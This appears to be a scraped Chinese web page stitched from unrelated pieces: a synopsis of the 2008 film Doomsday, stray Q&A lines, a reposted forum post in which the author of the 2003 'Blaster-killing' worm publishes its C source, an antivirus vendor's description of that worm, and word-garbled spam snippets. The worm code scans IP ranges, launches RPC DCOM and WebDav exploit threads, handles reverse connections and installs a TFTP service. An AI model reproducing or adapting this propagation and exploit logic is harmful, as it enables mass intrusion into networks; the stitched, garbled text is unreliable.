片名:末日侵袭
其它译名:世界末日/ 决战末世代
英文:Doomsday
类型:剧情 科幻 恐怖 惊怵 动作
上映:2008年03月14日
片长:105分钟
地区:英国
对白:英语
颜色:彩色
导演:尼尔·马歇尔(Neil Marshall )
演员表:
罗拉·迈特拉 .... Eden Sinclair
马尔科姆·麦克道尔 .... Kane
鲍勃·霍斯金斯 .... Bill Nelson
埃德里安·莱斯特 ....
亚历山大·塞迪 ....
西恩·帕特维 ....
Nora-Jane Noone ....
Rick Warden .... Chandler
马丁·康普斯顿 ....
MyAnna Buring ....
Langley Kirkwood .... Lt Bryant
Chris Robson .... Stevie Miller
Craig Conway .... Sol
有的时候,所谓明智的决定,只是代表着大多数人的利益而已。时间定格在2008年,一种靠皮肤接触就能够传染的致命病毒在英国肆虐,该病毒传染力极强,感染者无一生还。短短几天之内,重灾区苏格兰就有几百万人不幸遇难。英国的政府机构想不出任何良策来控制病毒,为了阻止病毒扩散而危及到全人类的生存,政府只有痛下决心将苏格兰地区隔离,期望能借此控制住病毒的传播。每一条高速公路、高架桥和铁路,都有军队把守,严禁任何车辆进出的同时,还修建了高高的钢铁围墙以加固封锁,往日恬静优美繁华锦簇的苏格兰如今成为了被遗忘的部落,成了病毒肆虐的天堂。被困其中的人们只有坐以待毙,毫无生存的希望……
2033年,当人们几乎将这件事情忘在脑后的时候,病毒又重新出现在人类的世界,这次竟然发生在了人口高度集中的伦敦,政府25年前做出的那次所谓“保护大多数人生命”的隔离计划也就此宣告失败。为了拯救人类的未来,首相迈克尔·卡纳里斯紧急传唤了国家安全部长官比尔·尼尔森。首相将手头隔离区的卫星图展示给了尼尔森,图中反映在与病毒接触25年后隔离区中依然有人类存活,这说明了这些人身上一定有着针对病毒的抗体。为了获取这种抗体以研制解药,尼尔森迅速召集了一批他手下最优秀的专家组成了一个专家小组,决定冒着风险进入那块已经被遗忘的孤独之地,找到对抗病毒的反作用药剂。小组由坚韧的女指挥官伊登·辛克莱领导,25年前她被迫将母亲留在隔离区自己踏上了离开的直升机。
多年来她心中一直对母亲惦念不忘,这次任务对于她来说更有如回家一般。不过,一旦进入了黑暗的病毒隔离区,探险队们就只有靠自己了。她带领着队员们踩着满大街的尸体,进入了那片被遗弃的疫区,却惊讶地发现,这块被隔离了25年的地方,早就变成了荒蛮之地,里面满是凶狠、充满野性的幸存者,而且在无政府的状态下,衍生出了类似于部落之间的派系争斗。伊登和她的队员不幸地走进了两个嗜血成性的派别之间的夹缝中,只能不断地战斗,才能在这里争取到生存的权力。为了人类的命运,探险队踏上了义无反顾的旅程。
嫌犯还在进一步的追逃之中,但是我们相信要不了多久,证明嫌犯就会被绳之以法。
是的,中美民间关系积极向好,科学无国界,彼此也承认对方的技术水平和工作能力。
这个问题警察也想知道 也没人在网上公布
给您转一篇文章 也许对您有用
冲击波杀手的作者网上现身
前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见
http://www.donews.com/donews/article/5/50423.html
8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。
下文为作者自述-转自某安全论坛
玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~
char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~
Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";
偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~
A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!
======================================================
0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~
1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~
2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~
3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~
4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~
5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~
//偶婆婆, 烂代码~~~ 将就看吧~~~
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp
if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了
//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();
LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);
if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}
if ( nLanguageID == -1)
return FALSE;
char szServicePack[] = "RpcServicePack.exe";
// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}
char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);
HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;
if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);
Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}
return TRUE;
}
// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;
for (int i=0;i (nBCount * 256 * 256); i++){
if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;
if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp8) == 0xc5 ||
(BYTE)(uComp16) == 0xc5 ||
(BYTE)(uComp24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp8) == 0x9999 ||
(WORD)(uComp16) == 0x9999 )
continue;
u_long *myPara = new u_long;
if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}
if ( myPara ){
if ( hThread )
CloseHandle(hThread);
*myPara = htonl( uComp);
DWORD dwThreadId;
if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);
Sleep(2);
}
//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(g_CurThreadCount) 未来得及运行,一次性建立了N个线程的
bug!
if ( bFirst (i = nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}
while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);
}
Sleep(60000);
}
//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),wsd)!=0)
return;
//杀蠕虫
KillMsblast();
//卸载
SYSTEMTIME st;
GetLocalTime(st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将
自身文件删除了
}
srand( GetTickCount() );
memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~
//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);
//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();
CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口
//打补丁
DoServicePackFunction();
//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);
if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}
Sleep(2000); //等待接收线程中的全局 rand bind port
u_long ulIP;
for(;{ //估算了一下,普通机器2小时一循环
//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP = 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);
//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);
//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);
//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~
KillMsblast();
}
//WSACleanup();
}
--------------------------------------------------------------------------------------------------
为方便阅读,增加几个补充说明
1.flashsky www.xfocus.net创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。
2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。
3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。
瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。
瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。
由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。
没有。
接种HPV疫苗要前往社区卫生服务中心等正规机构进行预约,切记不要盲目相信个人中介,更不要贪图便宜购买“特价疫苗”,确保准时接种完三针才最重要。
每年到了天气 的时候,很多 人都会在河边或者火库旁边玩。然而, 在那个时候很容易形成溺水 产生 。每年暑假和寒...
干预 运动 后,应该会有一点口感 。以上是为年夜 野整顿 几个进党热情分子训练班口吃理解 范文,以求参照。领会...
春天是我们心爱的季节 。昨天,我们去感受感染 春天气味 的句子。我们心爱的秋天女人 用轻 的手走向世界,然后充...
尊重 的衡火学校 学校少,尊重 班主任战各科先生 ,就是作为一个野少写给丈夫的感激 怀疑:?200年5月28日...
参不雅 之后,许多 人的口外信任都被感动了。以下是对 野生整顿 的 陵墓 参不雅 口腔患者的理解 范文。愿望...
对于很多 职场员工 说,在每周停止 的时候,都要写每周的周事 总结。写周事 总结,是否回忆 一周的事情 有义务...